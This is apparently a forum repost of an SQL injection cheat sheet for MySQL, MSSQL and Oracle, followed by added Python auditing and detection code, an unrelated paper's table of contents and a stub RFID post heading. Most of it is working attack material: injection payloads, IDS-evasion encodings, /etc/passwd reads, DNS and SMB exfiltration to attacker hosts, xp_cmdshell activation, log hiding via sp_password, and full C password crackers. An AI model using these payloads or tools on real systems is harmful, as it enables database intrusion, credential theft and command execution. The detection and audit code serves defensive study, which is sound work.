* 1' ORDER BY 1-- - True
* 1' ORDER BY 2-- - True
* 1' ORDER BY 3-- - True
* 1' ORDER BY 4-- - False (Only 3 Columns)
* -1' UNION SELECT 1,2,3-- -
* Error Based:
  o AND (SELECT * FROM SOME_TABLE) = 1
  o Operand should contain 3 column(s)
Note: This works if you know the table name you're after and error showing is enabled.

Retrieving Tables
* Union:
  o UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;
* Blind:
  o AND (SELECT SUBSTR(table_name,1,1) FROM information_schema.tables LIMIT 1) > 'A'
* Error:
  o AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
Note:
* version=9 for MySQL 4
* version=10 for MySQL 5

Retrieving Columns
* Union:
  o UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
* Blind:
  o AND (SELECT SUBSTR(column_name,1,1) FROM information_schema.columns LIMIT 1) > 'A'
* Error:
  o AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
  o AND (1,2,3) = (SELECT * FROM SOME_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1
* Procedure Analyse():
  o Refer to PROCEDURE ANALYSE() below.

Note: The GROUP_CONCAT() function allows grouping of the tables/columns, instead of viewing them one at a time.
Note:
* Output is limited to 1024 chars by default.
* All default database table names: ~900 chars
* All default database column names: ~6000 chars

PROCEDURE ANALYSE()
* 1 PROCEDURE ANALYSE() #get first column name
* 1 LIMIT 1,1 PROCEDURE ANALYSE() #get second column name
* 1 LIMIT 2,1 PROCEDURE ANALYSE() #get third column name
Note: It is necessary that the webapp displays the first selected column of the SQL query you are injecting into.

Find Tables from Column Name
* SELECT table_name FROM information_schema.columns WHERE column_name = 'username'; - Finds the table names for any columns named username.
* SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%'; - Finds the table names for any columns that contain the word user.

Find Column From Table Name
* SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';
* SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%';

Avoiding the use of single/double quotations
* UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username = 0x61646D696E
* UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)

String concatenation
* SELECT concat('a','a','a')
* SELECT 'a' 'a' 'a'
* SELECT/*/'a'/*/ 'd'/*/ 'mi'/*/ 'n'

Privileges

FILE privilege
MySQL 4/5
* ' UNION SELECT file_priv,null FROM mysql.user WHERE user = 'username
* ' AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y
MySQL 5
* ' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%
* ' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1)='Y

Out Of Band Channeling

Timing
* BENCHMARK()
* SLEEP() (MySQL 5)
* IF(), (CASE()WHEN)
* ' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('test')), false)) - '

DNS (requires FILE privilege)
* SELECT LOAD_FILE(concat('\\\\foo.',(select MID(version(),1,1)),'.attacker.com\\'));

SMB (requires FILE privilege)
* ' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt

Reading Files (requires FILE privilege)
* LOAD_FILE()
* UNION SELECT LOAD_FILE('/etc/passwd')-- -
Note:
* file must be located on the server host
* the base directory for load_file() is the @@datadir
* the file must be readable by the MySQL user
* the file size must be less than max_allowed_packet
* UNION SELECT @@max_allowed_packet (default value is 1047552 Byte)

Writing Files (requires FILE privilege)
* INTO OUTFILE/DUMPFILE
* AND 1=0 UNION SELECT 'code', null INTO OUTFILE '/tmp/file
Note:
* you can't overwrite files with INTO OUTFILE
* INTO OUTFILE must be the last statement in the query
* there is no way to encode the pathname, so quotes are required

Stacked Queries with PDO
Stacked queries are possible when PHP uses the PDO_MYSQL driver to make a connection to the database.
Example:
* AND 1=0; INSERT INTO Users(username,password,priv) VALUES ('BobbyTables', 'kl20da$$','admin');

User Defined Functions
UDF

Fuzzing and Obfuscation

Allowed Intermediary Characters:
* 09
* 10
* 0A
* 0B
* 0C
* 0D
* A0
Example: '%0A%09UNION%0CSELECT%10NULL%23
* 28
* 29
Example: union(select(column)from(table))
Note: URL Encoding your injection can sometimes be useful for IDS evasion.
%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31

Allowed Intermediary Characters after AND/OR
* 2B
* 2D
* 7E
Example: SELECT 1 FROM Test WHERE 1=1 AND-+-+-+-+~~((1))
$prefixes = array(" ", "+", "-", "~", "!", "@", " ");
* 09
* 0A
* 0B
* 0D
* 0C
* 20
Example: SELECT 1 FROM information_schema%20%0C%20.%20%09tables;

Operators
$operators = array("^", "=", "!=", "%", "/", "*", "&", "&&", "|", "||", "<", ">", ">>", "<<", ">=", "<=", "<>", "<=>", "AND", "OR", "XOR", "DIV", "LIKE", "RLIKE", "SOUNDS LIKE", "REGEXP", "IS", "NOT");

Constants
* current_user
* null, \N
* true, false

MySQL Functions()

MySQL Password Hashing (Taken from MySQL website)
Prior to MySQL 4.1, password hashes computed by the PASSWORD() function are 16 bytes long. Such hashes look like this:

+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

As of MySQL 4.1, the PASSWORD() function has been modified to produce a longer 41-byte hash value:

+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

MySQL Password() Cracker
Cain & Abel, JTR are capable of cracking MySQL 3.x-6.x passwords.

MySQL < 4.1 Password Cracker
This tool is a high-speed brute-force password cracker for MySQL hashed passwords. It can break an 8-character password containing any printable ASCII characters in a matter of hours on an ordinary PC.

/* This program is public domain. Share and enjoy.
 *
 * Example:
 * $ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast
 * $ MySQLfast 6294b50f67eda209
 * Hash: 6294b50f67eda209
 * Trying length 3
 * Trying length 4
 * Found pass: barf
 *
 * The MySQL password hash function could be strengthened considerably
 * by:
 * - making two passes over the password
 * - using a bitwise rotate instead of a left shift
 * - causing more arithmetic overflows
 */

#include <stdio.h>

typedef unsigned long u32;

/* Allowable characters in password; 33-126 is printable ascii */
#define MIN_CHAR 33
#define MAX_CHAR 126

/* Maximum length of password */
#define MAX_LEN 12

#define MASK 0x7fffffffL

/* Walks every password of length stop+4 whose hash state can still reach
 * (targ1, targ2); the last three characters are solved for arithmetically
 * instead of enumerated. The [i] subscripts were lost when the forum
 * rendered them as italics and are restored here. */
int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
{
  int i, c;
  u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
  u32 newstate1, newstate2, newstate3;
  u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
  u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
  i = -1;
  sum = 7;
  state1_ary[0] = 1345345333L;
  state2_ary[0] = 0x12345671L;

  while (1) {
    while (i < stop) {
      i++;
      pass_ary[i] = MIN_CHAR;
      step_ary[i] = (state1_ary[i] & 0x3f) + sum;
      xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
      sum += MIN_CHAR;
      state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
      state2_ary[i+1] = state2_ary[i]
        + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
    }

    state1 = state1_ary[i+1];
    state2 = state2_ary[i+1];
    step = (state1 & 0x3f) + sum;
    xor1 = step*MIN_CHAR + (state1 << 8);
    xor2 = (state2 << 8) ^ state1;

    for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
      newstate2 = state2 + (xor1 ^ xor2);
      newstate1 = state1 ^ xor1;

      newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
      div = (newstate1 & 0x3f) + sum + c;
      diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
      if (diff % div != 0) continue;
      d = diff / div;
      if (d < MIN_CHAR || d > MAX_CHAR) continue;

      div = (newstate3 & 0x3f) + sum + c + d;
      diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
      if (diff % div != 0) continue;
      e = diff / div;
      if (e < MIN_CHAR || e > MAX_CHAR) continue;

      pass_ary[i+1] = c;
      pass_ary[i+2] = d;
      pass_ary[i+3] = e;
      return 1;
    }

    while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
      sum -= MAX_CHAR;
      i--;
    }
    if (i < 0) break;
    pass_ary[i]++;
    xor_ary[i] += step_ary[i];
    sum++;
    state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
    state2_ary[i+1] = state2_ary[i]
      + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
  }

  return 0;
}

void crack(char *hash)
{
  int i, len;
  u32 targ1, targ2, targ3;
  int pass[MAX_LEN];

  if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
    printf("Invalid password hash: %s\n", hash);
    return;
  }
  printf("Hash: %08lx%08lx\n", targ1, targ2);

  targ3 = targ2 - targ1;
  targ3 = targ2 - ((targ3 << 8) ^ targ1);
  targ3 = targ2 - ((targ3 << 8) ^ targ1);
  targ3 = targ2 - ((targ3 << 8) ^ targ1);

  for (len = 3; len <= MAX_LEN; len++) {
    printf("Trying length %d\n", len);
    if ( crack0(len-4, targ1, targ3, pass) ) {
      printf("Found pass: ");
      for (i = 0; i < len; i++)
        putchar(pass[i]);
      putchar('\n');
      break;
    }
  }

  if (len > MAX_LEN)
    printf("Pass not found\n");
}

int main(int argc, char *argv[])
{
  int i;
  if (argc <= 1)
    printf("usage: %s hash\n", argv[0]);
  for (i = 1; i < argc; i++)
    crack(argv[i]);
  return 0;
}

MSSQL

Default Databases
* pubs
* model
* msdb
* tempdb
* northwind
* information_schema (>= 2000)

Comment Out Query
* /*
* --

Testing Version
* @@VERSION
* VERSION()

Retrieving user names/passwords
* Database.Table:
  o master..syslogins, master..sysprocesses
* Columns:
  o name, loginame
* Current User: user, system_user, suser_sname(), is_srvrolemember('sysadmin')
* Database Credentials:
  o SELECT user, password FROM master.dbo.sysxlogins
Example:
* SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID; -- Returns current user
* SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);-- Is Admin?
Database Server Hostname
* @@servername
* SERVERPROPERTY()
Example: SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition') -- Only available >= SQL Server 2005

Listing Databases
* Table: master..sysdatabases
* Column: name
* Function: DB_NAME(i)
Example:
* SELECT name FROM master..sysdatabases;
* SELECT DB_NAME(5);

We can retrieve the tables/columns from two different sources: information_schema.tables and information_schema.columns, or master..sysobjects and master..syscolumns.

Tables & Columns

Retrieving Tables
* Union:
  o UNION SELECT name FROM master..sysobjects WHERE xtype='U' --
* Blind:
  o AND (SELECT TOP 1 SUBSTRING(table_name,1,1) FROM information_schema.tables) > 'A'
* Error Based:
  o AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)
  o AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))
Note: Xtype = 'U' is for User-defined tables. You can use 'V' for views.

Retrieving Columns
* Union:
  o UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..sysobjects WHERE name = 'tablename')
* Blind:
  o AND (SELECT TOP 1 SUBSTRING(column_name,1,1) FROM information_schema.columns) > 'A'
* Error Based:
  o AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns)
  o AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))

Retrieving Multiple Tables/Columns at once
The following 3 queries will create a temporary table/column and insert all the user-defined tables into it, then dump the table content and finish by deleting the table.
* Create Temp Table/Column and Insert Data:
  o AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
* Dump Content:
  o AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);
* Delete Table:
  o AND 1=0; DROP TABLE TMP_DB;
Note: You can encode your query in hex to "obfuscate" your attack.
' and 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--sp_password

OPENROWSET Attacks
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"')

System Command Execution
MSSQL includes an extended stored procedure named xp_cmdshell that can be used to execute operating system commands.
EXEC master.dbo.xp_cmdshell 'cmd'
Prior to MSSQL 2005, xp_cmdshell is disabled by default, but can easily be activated with the following queries:
EXEC sp_configure 'show advanced options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'xp_cmdshell', 1
EXEC sp_configure reconfigure
Alternatively, you can create your own procedure to achieve the same results:
DECLARE @execmd INT
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'
If the SQL version is higher than 2000, you will have to run additional queries in order to execute the previous command:
EXEC sp_configure 'show advanced options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'OLE Automation Procedures', 1
EXEC sp_configure reconfigure

SP_PASSWORD (Hiding Query)
Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure.
Example:
' and 1=1--sp_password
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
Fuzzing and Obfuscation

Encodings
* Hex
  o ' and 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--sp_password
* Unicode
  o %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0031%u0020%u0046%u0052%u004f%u004d%u0020%u0064%u0075%u0061%u006c
* URL Encoded
  o %53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%64%75%61%6c
* HTML Entities
  o &#65;&#78;&#68; &#83;&#69;&#76;&#69;&#67;&#84; &#49; &#70;&#82;&#79;&#77; &#100;&#117;&#97;&#108; &#61; &#49; (AND SELECT 1 FROM dual = 1; the & has to be URL Encoded)
  o %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2383%3B%26%2369%3B%26%2376%3B%26%2369%3B%26%2367%3B%26%2384%3B%26%2332%3B%26%2349%3B%26%2332%3B%26%2370%3B%26%2382%3B%26%2379%3B%26%2377%3B%26%2332%3B%26%23100%3B%26%23117%3B%26%2397%3B%26%23108%3B%26%2332%3B%26%2361%3B%26%2332%3B%26%2349%3B

MSSQL Password Hashing
Passwords begin with 0x0100; the first four bytes following the 0x are a constant, the next eight bytes are the hash salt, and the remaining 80 bytes are two hashes: the first 40 bytes are a case-sensitive hash of the password, while the second 40 bytes are the hash of the uppercased version.
Example: 0x0100236A261CE12AB57BA22A7F44CE3B780E52098378B65852892EEE9 ... 1C0784B911D76BF4EB124550ACABDFD1457

MSSQL Password Cracker

/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// This will perform a dictionary attack against the
// upper-cased hash for a password. Once this
// has been discovered try all case variant to work
// out the case sensitive password.
//
// This code was written by David Litchfield to
// demonstrate how Microsoft SQL Server 2000
// passwords can be attacked. This can be
// optimized considerably by not using the CryptoAPI.
//
// (Compile with VC++ and link with advapi32.lib
// Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <wincrypt.h>

FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;

int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);

int main(int argc, char *argv[])
{
  int err = 0;
  if(argc !=3)
  {
    printf("\n\n*** SQLCrack *** \n\n");
    printf("C:\\>%s hash passwd-file\n\n",argv[0]);
    printf("David Litchfield (david@ngssoftware.com)\n");
    printf("24th June 2002\n");
    return 0;
  }

  err = OpenPasswordFile(argv[2]);
  if(err !=0)
  {
    return printf("\nThere was an error opening the password file %s\n",argv[2]);
  }

  err = CrackPassword(argv[1]);
  fclose(fd);
  printf("\n\n%d",wd);
  return 0;
}

int OpenPasswordFile(char *pwdfile)
{
  fd = fopen(pwdfile,"r");
  if(fd)
    return 0;
  else
    return 1;
}

int CrackPassword(char *hash)
{
  char phash[100]="";
  char pheader[8]="";
  char pkey[12]="";
  char pnorm[44]="";
  char pucase[44]="";
  char pucfirst[8]="";
  char wttf[44]="";
  char uwttf[100]="";
  char *wp=NULL;
  char *ptr=NULL;
  int cnt = 0;
  int count = 0;
  unsigned int key=0;
  unsigned int t=0;
  unsigned int address = 0;
  unsigned int cmp=0;      /* sscanf("%x") stores an unsigned int, so not unsigned char */
  unsigned char x=0;
  HCRYPTPROV hProv=0;
  HCRYPTHASH hHash;
  DWORD hl=100;
  unsigned char szhash[100]="";
  int len=0;

  if(strlen(hash) !=94)
  {
    return printf("\nThe password hash is too short!\n");
  }

  /* Split the 0x0100 + salt + hash + uppercase-hash layout described above */
  if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X'))
  {
    hash = hash + 2;
    strncpy(pheader,hash,4);
    printf("\nHeader\t\t: %s",pheader);
    if(strlen(pheader)!=4)
      return printf("%s",lerr);

    hash = hash + 4;
    strncpy(pkey,hash,8);
    printf("\nRand key\t: %s",pkey);
    if(strlen(pkey)!=8)
      return printf("%s",lerr);

    hash = hash + 8;
    strncpy(pnorm,hash,40);
    printf("\nNormal\t\t: %s",pnorm);
    if(strlen(pnorm)!=40)
      return printf("%s",lerr);

    hash = hash + 40;
    strncpy(pucase,hash,40);
    printf("\nUpper Case\t: %s",pucase);
    if(strlen(pucase)!=40)
      return printf("%s",lerr);

    strncpy(pucfirst,pucase,2);
    sscanf(pucfirst,"%x",&cmp);
  }
  else
  {
    return printf("The password hash has an invalid format!\n");
  }

  printf("\n\nTrying...\n");

  if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
  {
    if(GetLastError()==NTE_BAD_KEYSET)
    {
      // KeySet does not exist. So create a new keyset
      if(!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_NEWKEYSET ))
      {
        printf("FAILLLLLLL!!!");
        return FALSE;
      }
    }
  }

  while(1)
  {
    // get a word to try from the file
    ZeroMemory(wttf,44);
    if(!fgets(wttf,40,fd))
      return printf("\nEnd of password file. Didn't find the password.\n");

    wd++;
    len = strlen(wttf);
    wttf[len-1]=0x00;
    ZeroMemory(uwttf,84);

    // Convert the word to UNICODE
    while(count < len)
    {
      uwttf[cnt]=wttf[count];
      cnt++;
      uwttf[cnt]=0x00;
      count++;
      cnt++;
    }

    len --;
    wp = uwttf;
    sscanf(pkey,"%x",&key);
    cnt = cnt - 2;

    // Append the random stuff to the end of
    // the uppercase unicode password
    t = key >> 24;
    x = (unsigned char) t;
    uwttf[cnt]=x;
    cnt++;

    t = key << 8;
    t = t >> 24;
    x = (unsigned char) t;
    uwttf[cnt]=x;
    cnt++;

    t = key << 16;
    t = t >> 24;
    x = (unsigned char) t;
    uwttf[cnt]=x;
    cnt++;

    t = key << 24;
    t = t >> 24;
    x = (unsigned char) t;
    uwttf[cnt]=x;
    cnt++;

    // Create the hash
    if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
    {
      printf("Error %x during CryptCreatHash!\n", GetLastError());
      return 0;
    }

    if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
    {
      printf("Error %x during CryptHashData!\n", GetLastError());
      return FALSE;
    }

    CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
    CryptDestroyHash(hHash);   /* release the hash object before the next word */

    // Test the first byte only. Much quicker.
    if(szhash[0] == cmp)
    {
      // If first byte matches try the rest
      ptr = pucase;
      cnt = 1;
      while(cnt < 20)
      {
        ptr = ptr + 2;
        strncpy(pucfirst,ptr,2);
        sscanf(pucfirst,"%x",&cmp);
        if(szhash[cnt]==cmp)
          cnt ++;
        else
        {
          break;
        }
      }
      if(cnt == 20)
      {
        // We've found the password
        printf("\nA MATCH!!! Password is %s\n",wttf);
        return 0;
      }
    }
    count = 0;
    cnt=0;
  }
  return 0;
}

ORACLE

Default Databases
* SYSTEM
* SYSAUX

Comment Out Query
* --

Testing Version
* SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'
* SELECT banner FROM v$version WHERE banner LIKE 'TNS%'
* SELECT version FROM v$instance

Retrieving Users/Passwords
* SELECT username FROM all_users
* SELECT name, password from sys.user$ (Privileges required, <= 10g)
* SELECT name, spare4 from sys.user$ (Privileges required, 11g)

Retrieving Databases
Current Database
* SELECT name FROM v$database;
* SELECT instance_name FROM v$instance
* SELECT global_name FROM global_name
* SELECT SYS.DATABASE_NAME FROM DUAL
User Databases

Tables & Columns
Retrieving Tables
* SELECT table_name FROM all_tables
Retrieving Columns
* SELECT column_name FROM all_tab_columns
Finding Tables from Column Name
* SELECT table_name FROM all_tab_columns WHERE column_name = 'password'
Finding Column From Table Name
* SELECT column_name FROM all_tab_columns WHERE table_name = 'Users'

Fuzzing and Obfuscation
Avoiding the use of single/double quotations
Unlike other RDBMS, Oracle allows us to reference table/column names encoded.
* SELECT chr(32)||chr(92)||chr(93) FROM dual
* SELECT 0x09120911091

Out Of Band Channeling
Time Delay
Heavy Query
Time delays

Sursa: Insecurity: SQL Injection Pocket Reference 2010 Cheat Sheet [sqlI]
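As an added example (not part of the pocket reference or the cracker above), the pre-4.1 PASSWORD() algorithm that produces the 16-hex-digit hashes shown in the MySQL Password Hashing section, together with a small audit that flags mysql.user rows still stored in that format; the account rows are constructed.

```python
"""Legacy MySQL PASSWORD() (pre-4.1) and an audit of mysql.user hash formats.

Added example; not part of the cheat sheet. The 16-hex-digit hashes shown
above come from the algorithm below (MySQL's old hash_password()); the
audit function flags accounts still stored that way so they can be
re-hashed into the 41-character, '*'-prefixed format after an upgrade.
"""
import re

MASK32 = 0xFFFFFFFF


def legacy_mysql_password(password: str) -> str:
    """Pre-4.1 MySQL PASSWORD(): returns 16 lowercase hex digits.

    Two 32-bit words are stirred once per character and the top bit of
    each is dropped, so the whole hash is 62 bits with no salt and no
    iteration count; that is why the cracker on this page can invert it
    for 8-character passwords in hours.
    """
    nr, nr2, add = 1345345333, 0x12345671, 7
    for ch in password:
        if ch in (" ", "\t"):            # the original skips spaces and tabs
            continue
        c = ord(ch)
        nr ^= (((nr & 63) + add) * c + (nr << 8)) & MASK32
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & MASK32
        add += c
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


LEGACY_RE = re.compile(r"^[0-9a-fA-F]{16}$")
NATIVE_RE = re.compile(r"^\*[0-9A-F]{40}$")


def classify_hash(stored: str) -> str:
    """'legacy' (pre-4.1), 'native' (4.1+ double SHA-1), 'empty' or 'unknown'."""
    if stored == "":
        return "empty"
    if LEGACY_RE.match(stored):
        return "legacy"
    if NATIVE_RE.match(stored):
        return "native"
    return "unknown"


def audit_user_table(rows):
    """rows: (user, host, password) tuples as read from mysql.user.

    Returns (user, host, reason) for every account that needs attention.
    """
    findings = []
    for user, host, stored in rows:
        kind = classify_hash(stored)
        if kind == "legacy":
            findings.append((user, host, "pre-4.1 hash; re-hash with the 4.1+ format"))
        elif kind == "empty":
            findings.append((user, host, "empty password"))
    return findings


# Constructed sample rows (not real accounts); the first is the cracker's
# own example hash, PASSWORD('barf') in the old format.
SAMPLE_ROWS = [
    ("root", "localhost", "6294b50f67eda209"),
    ("app", "%", "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4"),
    ("guest", "%", ""),
]

if __name__ == "__main__":
    print(legacy_mysql_password("barf"))        # 6294b50f67eda209
    for user, host, reason in audit_user_table(SAMPLE_ROWS):
        print(f"{user}@{host}: {reason}")
```

The audit only reads the stored hash format; on a live server the rows would come from SELECT user, host, password FROM mysql.user.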
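From the detection side, as an added example that is not part of the pocket reference: a normaliser that undoes the evasion tricks listed under both the MySQL and the MSSQL "Fuzzing and Obfuscation" sections before matching signatures, using the cheat sheet's own payloads as constructed samples; the signature list is an assumption, not a complete rule set.

```python
"""Normaliser for obfuscated SQL injection payloads, for the detection side.

Added example; not from the pocket reference. It undoes URL and %uXXXX
encoding, HTML numeric entities, hex string literals, MySQL /*!NNNNN */
version comments, ordinary comments, the intermediary bytes and the
AND/OR prefix characters so one plain-text signature matches every variant.
"""
import html
import re
from urllib.parse import unquote

# Bytes MySQL accepts between tokens (the cheat sheet's list, plus 0x20).
INTERMEDIARY = {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x10, 0x20, 0xA0}
# Characters MySQL accepts between AND/OR and the operand that follows.
PREFIX_CHARS = "+-~!@"

UNICODE_ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})")
HEX_LITERAL_RE = re.compile(r"0x((?:[0-9a-fA-F]{2}){2,})")
VERSION_COMMENT_RE = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
PREFIX_RE = re.compile(r"\b(AND|OR)\s*[" + re.escape(PREFIX_CHARS) + r"\s]+", re.I)

SIGNATURES = [                      # assumed rule set, kept deliberately small
    re.compile(r"\bUNION\b.*\bSELECT\b"),
    re.compile(r"\bINFORMATION_SCHEMA\b"),
    re.compile(r"\bXP_CMDSHELL\b"),
    re.compile(r"\bLOAD_FILE\s*\("),
    re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b"),
    re.compile(r"\bSP_PASSWORD\b"),
]


def decode_layers(payload: str, max_rounds: int = 3) -> str:
    """Peel %uXXXX, URL and HTML-entity encoding until nothing changes.

    Layers stack (an entity-encoded query is usually also URL-encoded),
    hence the loop; latin-1 keeps %A0 as a single character.
    """
    text = payload
    for _ in range(max_rounds):
        step = UNICODE_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
        step = unquote(step, encoding="latin-1")
        step = html.unescape(step)
        if step == text:
            break
        text = step
    return text


def _decode_hex_literal(m: "re.Match") -> str:
    """0x61646D696E -> 'admin'; non-printable literals are left untouched."""
    raw = bytes.fromhex(m.group(1))
    if all(0x20 <= b < 0x7F for b in raw):
        return "'" + raw.decode("ascii") + "'"
    return m.group(0)


def normalize_sql(payload: str) -> str:
    """Canonical form: decoded, comments gone, single spaces, upper case."""
    text = decode_layers(payload)
    text = HEX_LITERAL_RE.sub(_decode_hex_literal, text)
    # /*!50000 ... */ is executed by MySQL >= 5.0.0: keep the inner text.
    text = VERSION_COMMENT_RE.sub(lambda m: " " + m.group(1) + " ", text)
    text = COMMENT_RE.sub(" ", text)
    text = "".join(" " if ord(ch) in INTERMEDIARY else ch for ch in text)
    # AND-+-+~~x and AND -x both become "AND x": fine for matching, not for
    # reconstructing the exact expression the server evaluated.
    text = PREFIX_RE.sub(lambda m: m.group(1).upper() + " ", text)
    return re.sub(r"\s+", " ", text).strip().upper()


def looks_injected(payload: str) -> bool:
    """True when the normalised payload matches any signature."""
    norm = normalize_sql(payload)
    return any(sig.search(norm) for sig in SIGNATURES)


# Constructed samples: the cheat sheet's evasion examples, plus one benign query.
SAMPLES = [
    "'%0A%09UNION%0CSELECT%10NULL%23",
    "union(select(column)from(table))",
    "UNION SELECT /*!50000 5,null;x%A0*//*!40000 4,null-- ,*//*!30000 3,null-- x*/,null-- -",
    "' and 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--sp_password",
    "SELECT 1 FROM Test WHERE 1=1",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(looks_injected(sample), normalize_sql(sample))
```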
  23. RIPS - A static source code analyser for vulnerabilities in PHP scripts
Johannes Dahse
Seminar Work at the Chair for Network and Data Security, Prof. Dr. Jörg Schwenk, advised by Dominik Birk
23.08.2010

Contents
1 Introduction 1
2 Motivation 2
3 Web application security 3
3.1 Cross-Site Scripting 4
3.2 SQL Injection 5
3.3 Other vulnerabilities 6
4 Static source code analysis 7
4.1 Configuration 7
4.2 Model construction 7
4.3 Analysis 8
4.3.1 Taint analysis 8
4.3.2 Intraprocedural and interprocedural analysis 9
4.4 Results processing 9
5 RIPS implementation 11
5.1 Configuration 11
5.2 Model construction 12
5.2.1 Lexical and semantic analysis 12
5.2.2 Parsing 13
5.2.3 Control flow analysis 15
5.3 Analysis 15
5.3.1 Taint analysis 15
5.3.2 Intraprocedural and interprocedural analysis 16
5.4 Web interface 17
5.5 Scan results 19
5.6 Limitations and future work 20
6 Related work 22
7 Summary 24

Download: http://garr.dl.sourceforge.net/project/rips-scanner/rips-paper.pdf
Sursa: Papers
  24. [h=5]RFID (Radio Frequency Identification)[/h]
Article by: OrbitalJL

What is RFID?
